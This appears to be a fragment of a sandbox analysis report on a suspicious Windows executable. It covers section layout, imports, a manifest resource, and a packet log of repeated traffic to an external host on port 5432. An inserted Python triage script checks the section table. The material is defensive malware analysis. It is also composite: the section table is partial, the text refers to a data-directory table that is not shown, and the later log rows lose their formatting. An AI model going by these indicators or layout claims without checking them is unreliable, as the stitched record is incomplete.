.rdata    0x3e000          0xe36eca      0xe37000  60af217ef049e0dd97bd2afa21116458  unknown   unknown              unknown                               unknown             IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data     0xe75000         0x2f20        0x1800    6d5b50432fd5d87db0c8867cb401d65f  False     0.1845703125         DOS executable (block device driver)  3.239229168675621   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata    0xe78000         0x37ec        0x3800    0910ecade5a97bfb43d63b0dcf36c345  False     0.47816685267857145  data                                  5.663839152874396   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.fptable  0xe7c000         0x100         0x200     bf619eac0cdf3f68d496ea9344137e8b  False     0.02734375           data                                  0.0                 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc     0xe7d000         0x1e8         0x200     ef916bf7b1806924ac302571ad1074b3  False     0.546875             data                                  4.772037401703051   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc    0xe7e000         0xa94         0xc00     aef26abe13eae7a5fc9990a8e46bfcfb  False     0.4690755208333333   data                                  5.140703611960964   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
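The "Is in Section" column of the data-directory table is obtained by resolving each directory RVA against the section table. The following added example, which is not part of the Joe Sandbox report, rebuilds that column from the values printed above and adds the layout checks a triager would run on this sample: which single section carries almost the whole file (here .rdata, the one section for which the sandbox could not compute entropy), whether any section is both writable and executable, which sections have zero-entropy raw bytes, and whether any directory falls outside every section or into writable memory. SECTION_ALIGNMENT (the report does not print it) and the triage rules are the author's assumptions, not report output.

```python
"""Rebuild the report's "Is in Section" column and run layout triage on the section table.

Added example, not part of the Joe Sandbox report. SECTIONS and DATA_DIRECTORIES are
copied from the report's tables for pyld611114.exe; SECTION_ALIGNMENT (not printed by
the report) and the triage rules are the author's assumptions.
"""
from dataclasses import dataclass
from typing import Dict, FrozenSet, List, Optional, Tuple

SECTION_ALIGNMENT = 0x1000  # assumed: MSVC default; the report does not print it


@dataclass(frozen=True)
class Section:
    name: str
    va: int                   # RVA at which the section is mapped
    vsize: int                # VirtualSize
    raw: int                  # SizeOfRawData
    entropy: Optional[float]  # None where the report prints "unknown"
    chars: FrozenSet[str]     # IMAGE_SCN_* flags with the prefix stripped


SECTIONS: List[Section] = [
    Section(".text",    0x1000,   0x3cf94,  0x3d000,  6.466922004661196, frozenset({"CNT_CODE", "MEM_EXECUTE", "MEM_READ"})),
    Section(".rdata",   0x3e000,  0xe36eca, 0xe37000, None,              frozenset({"CNT_INITIALIZED_DATA", "MEM_READ"})),
    Section(".data",    0xe75000, 0x2f20,   0x1800,   3.239229168675621, frozenset({"CNT_INITIALIZED_DATA", "MEM_READ", "MEM_WRITE"})),
    Section(".pdata",   0xe78000, 0x37ec,   0x3800,   5.663839152874396, frozenset({"CNT_INITIALIZED_DATA", "MEM_READ"})),
    Section(".fptable", 0xe7c000, 0x100,    0x200,    0.0,               frozenset({"CNT_INITIALIZED_DATA", "MEM_READ", "MEM_WRITE"})),
    Section(".rsrc",    0xe7d000, 0x1e8,    0x200,    4.772037401703051, frozenset({"CNT_INITIALIZED_DATA", "MEM_READ"})),
    Section(".reloc",   0xe7e000, 0xa94,    0xc00,    5.140703611960964, frozenset({"CNT_INITIALIZED_DATA", "MEM_DISCARDABLE", "MEM_READ"})),
]

# name -> (RVA, size); the directories the report lists as 0x0/0x0 are omitted
DATA_DIRECTORIES: Dict[str, Tuple[int, int]] = {
    "IMPORT":      (0xe74364, 0x3c),
    "RESOURCE":    (0xe7d000, 0x1e8),
    "EXCEPTION":   (0xe78000, 0x37ec),
    "BASERELOC":   (0xe7e000, 0xa94),
    "DEBUG":       (0xe6d010, 0x38),
    "LOAD_CONFIG": (0xe6ced0, 0x140),
    "IAT":         (0x3e000,  0x360),
}


def align_up(n: int, a: int = SECTION_ALIGNMENT) -> int:
    return (n + a - 1) // a * a


def mapped_end(s: Section) -> int:
    """End of the section in memory: the loader maps VirtualSize (SizeOfRawData if zero)
    rounded up to SectionAlignment, so data in the slack past VirtualSize still resolves."""
    return s.va + align_up(s.vsize or s.raw)


def section_for_range(rva: int, size: int = 1) -> Optional[str]:
    """Name of the section whose mapped range fully contains [rva, rva + size), else None."""
    for s in SECTIONS:
        if s.va <= rva and rva + size <= mapped_end(s):
            return s.name
    return None


def directory_sections() -> Dict[str, Optional[str]]:
    """The report's "Is in Section" column, recomputed from the two tables."""
    return {name: section_for_range(rva, size) for name, (rva, size) in DATA_DIRECTORIES.items()}


def image_size() -> int:
    return mapped_end(max(SECTIONS, key=lambda s: s.va))


def triage() -> dict:
    """Layout findings a triager wants before opening the file in a disassembler."""
    total_raw = sum(s.raw for s in SECTIONS)
    biggest = max(SECTIONS, key=lambda s: s.raw)
    by_name = {s.name: s for s in SECTIONS}
    dirs = directory_sections()
    return {
        # writable + executable memory is a classic self-modifying / unpacking-stub marker
        "rwx": [s.name for s in SECTIONS if {"MEM_EXECUTE", "MEM_WRITE"} <= s.chars],
        # which section carries the bulk of the file, and its share of the raw bytes
        "dominant": (biggest.name, biggest.raw / total_raw),
        # the sandbox gave up on these; compute the entropy yourself from the raw bytes
        "entropy_unknown": [s.name for s in SECTIONS if s.entropy is None],
        # entropy 0.0 with raw bytes present means a single repeated byte value (e.g. an all-zero page)
        "zero_entropy": [s.name for s in SECTIONS if s.entropy == 0.0 and s.raw > 0],
        # a directory no section covers is either corrupt or only meaningful after unpacking
        "directories_outside_sections": [n for n, sec in dirs.items() if sec is None],
        # directories that land in writable memory (worth noting for the import table and IAT)
        "writable_directories": [n for n, sec in dirs.items() if sec and "MEM_WRITE" in by_name[sec].chars],
    }
```

On this sample, `directory_sections()` reproduces the report's column exactly, `image_size()` comes out at 0xe7f000, and `triage()` reports no RWX section and no directory outside a section, but shows .rdata holding about 98 % of the raw bytes with no entropy value and .fptable as a zero-entropy page. The 15 MB .rdata is where to look first for an embedded payload.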
Name         RVA       Size   Type                                                      Language  Country        ZLIB Complexity
RT_MANIFEST  0xe7d060  0x188  XML 1.0 document, ASCII text, with CRLF line terminators  English   United States  0.5892857142857143
DLL           Import
KERNEL32.dll  OpenProcess, CreateToolhelp32Snapshot, Process32NextW, GetSystemDirectoryW, CloseHandle, CreateProcessW, SetEndOfFile, WaitForSingleObject, GetModuleFileNameW, TerminateProcess, Process32FirstW, GetModuleHandleExW, MultiByteToWideChar, LocalFree, FormatMessageA, GetLocaleInfoEx, QueryPerformanceCounter, QueryPerformanceFrequency, GetStringTypeW, CreateFileW, FindClose, FindFirstFileW, FindFirstFileExW, FindNextFileW, GetFileAttributesExW, SetFileInformationByHandle, AreFileApisANSI, GetLastError, GetModuleHandleW, GetProcAddress, GetFileInformationByHandleEx, WideCharToMultiByte, Sleep, GetCurrentThreadId, CompareStringEx, InitializeCriticalSectionEx, GetSystemTimeAsFileTime, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetCPInfo, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, IsProcessorFeaturePresent, GetCurrentProcessId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwindEx, RtlPcToFileHeader, RaiseException, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetStdHandle, WriteFile, ExitProcess, GetFileSizeEx, SetFilePointerEx, GetFileType, HeapAlloc, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, HeapFree, HeapReAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, VirtualProtect, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, ReadFile, ReadConsoleW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetProcessHeap, HeapSize, WriteConsoleW, RtlUnwind
ADVAPI32.dll  RegSetValueExW, RegOpenKeyExW, RegQueryValueExW, RegCloseKey
Language of compilation system  Country where language is spoken  Map
English                         United States
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Dec 18, 2024 12:41:45.745776892 CET  49814        443        192.168.2.6      34.117.59.81
Dec 18, 2024 12:41:45.745816946 CET  443          49814      34.117.59.81     192.168.2.6
Dec 18, 2024 12:41:45.745943069 CET  49814        443        192.168.2.6      34.117.59.81
Dec 18, 2024 12:41:45.792438030 CET  49814        443        192.168.2.6      34.117.59.81
Dec 18, 2024 12:41:45.792467117 CET  443          49814      34.117.59.81     192.168.2.6
Dec 18, 2024 12:41:47.006822109 CET  443          49814      34.117.59.81     192.168.2.6
Dec 18, 2024 12:41:47.006901026 CET  49814        443        192.168.2.6      34.117.59.81
Dec 18, 2024 12:41:47.014620066 CET  49814        443        192.168.2.6      34.117.59.81
Dec 18, 2024 12:41:47.014661074 CET  443          49814      34.117.59.81     192.168.2.6
Dec 18, 2024 12:41:47.014822960 CET  49814        443        192.168.2.6      34.117.59.81
Dec 18, 2024 12:41:47.014926910 CET  443          49814      34.117.59.81     192.168.2.6
Dec 18, 2024 12:41:47.014987946 CET  49814        443        192.168.2.6      34.117.59.81
Dec 18, 2024 12:41:57.856072903 CET  49844        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:41:57.975671053 CET  5432         49844      188.116.21.204   192.168.2.6
Dec 18, 2024 12:41:57.975780964 CET  49844        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:41:57.976932049 CET  49844        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:41:58.096438885 CET  5432         49844      188.116.21.204   192.168.2.6
Dec 18, 2024 12:41:59.249964952 CET  5432         49844      188.116.21.204   192.168.2.6
Dec 18, 2024 12:41:59.266490936 CET  49844        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:41:59.386128902 CET  5432         49844      188.116.21.204   192.168.2.6
Dec 18, 2024 12:41:59.661315918 CET  5432         49844      188.116.21.204   192.168.2.6
Dec 18, 2024 12:41:59.662338018 CET  49844        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:41:59.781898022 CET  5432         49844      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:00.059653997 CET  5432         49844      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:00.059767008 CET  5432         49844      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:00.059819937 CET  49844        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:42:00.061950922 CET  49844        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:42:00.062078953 CET  49844        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:42:00.181540966 CET  5432         49844      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:00.181567907 CET  5432         49844      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:00.456337929 CET  5432         49844      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:00.456937075 CET  49844        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:42:00.631782055 CET  5432         49844      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:00.871494055 CET  5432         49844      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:00.878434896 CET  49844        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:42:00.998147964 CET  5432         49844      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:01.275698900 CET  5432         49844      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:01.276027918 CET  49844        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:42:01.395663023 CET  5432         49844      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:01.670129061 CET  5432         49844      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:01.670377970 CET  49844        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:42:01.790002108 CET  5432         49844      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:02.066909075 CET  5432         49844      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:02.067536116 CET  49844        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:42:02.187511921 CET  5432         49844      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:02.469691992 CET  5432         49844      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:02.524849892 CET  49844        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:42:02.577550888 CET  49844        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:42:02.697150946 CET  5432         49844      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:02.971921921 CET  5432         49844      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:02.972107887 CET  49844        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:42:03.091702938 CET  5432         49844      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:03.366796017 CET  5432         49844      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:03.366905928 CET  5432         49844      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:03.366955996 CET  49844        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:42:03.367095947 CET  49844        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:42:03.486588001 CET  5432         49844      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:03.761091948 CET  5432         49844      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:03.806140900 CET  49844        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:42:03.906635046 CET  49860        443        192.168.2.6      20.233.83.145
Dec 18, 2024 12:42:03.906682014 CET  443          49860      20.233.83.145    192.168.2.6
Dec 18, 2024 12:42:03.906739950 CET  49860        443        192.168.2.6      20.233.83.145
Dec 18, 2024 12:42:03.907952070 CET  49860        443        192.168.2.6      20.233.83.145
Dec 18, 2024 12:42:03.907967091 CET  443          49860      20.233.83.145    192.168.2.6
Dec 18, 2024 12:42:05.550216913 CET  443          49860      20.233.83.145    192.168.2.6
Dec 18, 2024 12:42:05.550321102 CET  49860        443        192.168.2.6      20.233.83.145
Dec 18, 2024 12:42:05.552170992 CET  49860        443        192.168.2.6      20.233.83.145
Dec 18, 2024 12:42:05.552189112 CET  443          49860      20.233.83.145    192.168.2.6
Dec 18, 2024 12:42:05.552403927 CET  49860        443        192.168.2.6      20.233.83.145
Dec 18, 2024 12:42:05.552419901 CET  443          49860      20.233.83.145    192.168.2.6
Dec 18, 2024 12:42:05.552437067 CET  443          49860      20.233.83.145    192.168.2.6
Dec 18, 2024 12:42:05.552486897 CET  49860        443        192.168.2.6      20.233.83.145
Dec 18, 2024 12:42:05.552669048 CET  49844        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:42:05.672295094 CET  5432         49844      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:05.957905054 CET  5432         49844      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:05.958146095 CET  49844        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:42:06.077928066 CET  5432         49844      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:06.352514029 CET  5432         49844      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:06.352881908 CET  49844        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:42:06.472544909 CET  5432         49844      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:06.766166925 CET  5432         49844      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:06.768115044 CET  49872        443        192.168.2.6      20.233.83.145
Dec 18, 2024 12:42:06.768233061 CET  443          49872      20.233.83.145    192.168.2.6
Dec 18, 2024 12:42:06.768333912 CET  49872        443        192.168.2.6      20.233.83.145
Dec 18, 2024 12:42:06.768745899 CET  49872        443        192.168.2.6      20.233.83.145
Dec 18, 2024 12:42:06.768784046 CET  443          49872      20.233.83.145    192.168.2.6
Dec 18, 2024 12:42:06.821799040 CET  49844        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:42:08.347330093 CET  443          49872      20.233.83.145    192.168.2.6
Dec 18, 2024 12:42:08.347410917 CET  49872        443        192.168.2.6      20.233.83.145
Dec 18, 2024 12:42:08.348953962 CET  49872        443        192.168.2.6      20.233.83.145
Dec 18, 2024 12:42:08.348967075 CET  443          49872      20.233.83.145    192.168.2.6
Dec 18, 2024 12:42:08.349134922 CET  49872        443        192.168.2.6      20.233.83.145
Dec 18, 2024 12:42:08.349143982 CET  443          49872      20.233.83.145    192.168.2.6
Dec 18, 2024 12:42:08.349159002 CET  443          49872      20.233.83.145    192.168.2.6
Dec 18, 2024 12:42:08.349356890 CET  49872        443        192.168.2.6      20.233.83.145
Dec 18, 2024 12:42:08.349468946 CET  49844        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:42:08.349507093 CET  49844        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:42:08.349657059 CET  49844        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:42:08.352796078 CET  49881        443        192.168.2.6      20.233.83.145
Dec 18, 2024 12:42:08.352832079 CET  443          49881      20.233.83.145    192.168.2.6
Dec 18, 2024 12:42:08.353043079 CET  49881        443        192.168.2.6      20.233.83.145
Dec 18, 2024 12:42:08.354721069 CET  49881        443        192.168.2.6      20.233.83.145
Dec 18, 2024 12:42:08.354729891 CET  443          49881      20.233.83.145    192.168.2.6
Dec 18, 2024 12:42:08.469007015 CET  5432         49844      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:08.469029903 CET  5432         49844      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:08.469856024 CET  5432         49844      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:08.469913006 CET  49844        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:42:09.934743881 CET  443          49881      20.233.83.145    192.168.2.6
Dec 18, 2024 12:42:09.934914112 CET  49881        443        192.168.2.6      20.233.83.145
Dec 18, 2024 12:42:09.936140060 CET  49881        443        192.168.2.6      20.233.83.145
Dec 18, 2024 12:42:09.936146975 CET  443          49881      20.233.83.145    192.168.2.6
Dec 18, 2024 12:42:09.936183929 CET  49881        443        192.168.2.6      20.233.83.145
Dec 18, 2024 12:42:09.939627886 CET  443          49881      20.233.83.145    192.168.2.6
Dec 18, 2024 12:42:09.939698935 CET  49881        443        192.168.2.6      20.233.83.145
Dec 18, 2024 12:42:10.076209068 CET  49886        443        192.168.2.6      185.199.110.133
Dec 18, 2024 12:42:10.076263905 CET  443          49886      185.199.110.133  192.168.2.6
Dec 18, 2024 12:42:10.076358080 CET  49886        443        192.168.2.6      185.199.110.133
Dec 18, 2024 12:42:10.076817036 CET  49886        443        192.168.2.6      185.199.110.133
Dec 18, 2024 12:42:10.076838017 CET  443          49886      185.199.110.133  192.168.2.6
Dec 18, 2024 12:42:11.291574955 CET  443          49886      185.199.110.133  192.168.2.6
Dec 18, 2024 12:42:11.291678905 CET  49886        443        192.168.2.6      185.199.110.133
Dec 18, 2024 12:42:11.293262005 CET  49886        443        192.168.2.6      185.199.110.133
Dec 18, 2024 12:42:11.293270111 CET  443          49886      185.199.110.133  192.168.2.6
Dec 18, 2024 12:42:11.293394089 CET  49886        443        192.168.2.6      185.199.110.133
Dec 18, 2024 12:42:11.293421984 CET  443          49886      185.199.110.133  192.168.2.6
Dec 18, 2024 12:42:11.295424938 CET  49886        443        192.168.2.6      185.199.110.133
Dec 18, 2024 12:42:16.308082104 CET  49901        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:42:16.428112984 CET  5432         49901      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:16.428222895 CET  49901        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:42:16.428333044 CET  49901        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:42:16.547903061 CET  5432         49901      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:17.762682915 CET  5432         49901      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:17.763626099 CET  49901        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:42:17.883352995 CET  5432         49901      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:18.196111917 CET  5432         49901      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:18.197952986 CET  49901        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:42:18.317639112 CET  5432         49901      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:18.934931993 CET  5432         49901      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:18.934973955 CET  5432         49901      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:18.935033083 CET  49901        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:42:18.935858011 CET  49901        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:42:18.935976982 CET  49901        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:42:19.055402040 CET  5432         49901      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:19.055449963 CET  5432         49901      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:19.375169039 CET  5432         49901      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:19.375366926 CET  49901        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:42:19.494895935 CET  5432         49901      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:19.809849024 CET  5432         49901      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:19.816788912 CET  49901        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:42:19.937582016 CET  5432         49901      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:20.253992081 CET  5432         49901      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:20.306145906 CET  49901        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:42:23.681864977 CET  49901        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:42:23.801480055 CET  5432         49901      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:24.113873005 CET  5432         49901      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:24.114089012 CET  49901        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:42:24.233525991 CET  5432         49901      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:24.558578014 CET  5432         49901      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:24.558906078 CET  49901        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:42:24.678585052 CET  5432         49901      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:24.991329908 CET  5432         49901      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:24.991518021 CET  49901        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:42:25.111907959 CET  5432         49901      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:25.423834085 CET  5432         49901      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:25.424154997 CET  49901        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:42:25.543751955 CET  5432         49901      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:25.856682062 CET  5432         49901      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:25.857045889 CET  49901        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:42:25.976804972 CET  5432         49901      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:26.318187952 CET  5432         49901      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:26.318386078 CET  49901        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:42:26.437947989 CET  5432         49901      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:26.750992060 CET  5432         49901      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:26.751566887 CET  49901        5432       192.168.2.6      188.116.21.204
Dec 18, 2024 12:42:26.873060942 CET  5432         49901      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:27.188535929 CET  5432         49901      188.116.21.204   192.168.2.6
Dec 18, 2024 12:42:27.208978891 CET  49901        5432       192.168.2.6      188.116.21.204
                                                                                          Dec 18, 2024 12:42:27.328588963 CET543249901188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:27.640945911 CET543249901188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:27.647339106 CET499015432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:27.647408009 CET499015432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:27.647589922 CET499015432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:27.760592937 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:27.767963886 CET543249901188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:27.767996073 CET543249901188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:27.768289089 CET543249901188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:27.768342018 CET499015432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:27.880220890 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:27.880311966 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:27.884556055 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:28.004045963 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:29.254224062 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:29.256609917 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:29.376329899 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:29.694022894 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:29.695348978 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:29.814907074 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:30.488845110 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:30.488866091 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:30.488929033 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:30.489842892 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:30.489940882 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:30.609667063 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:30.609775066 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:30.930354118 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:30.930560112 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:31.050107002 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:31.367232084 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:31.373871088 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:31.493724108 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:32.112473965 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:32.165560961 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:35.338248968 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:35.457901955 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:35.777215004 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:35.777419090 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:35.897000074 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:36.227410078 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:36.227711916 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:36.347256899 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:36.665122032 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:36.665333986 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:36.784903049 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:37.102188110 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:37.102451086 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:37.221900940 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:37.550333023 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:37.550529957 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:37.670964003 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:37.989000082 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:37.989212036 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:38.108979940 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:38.435173035 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:38.435368061 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:38.555358887 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:38.905139923 CET543249929188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:38.905540943 CET499295432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:39.025799990 CET543249929188.116.21.204192.168.2.6
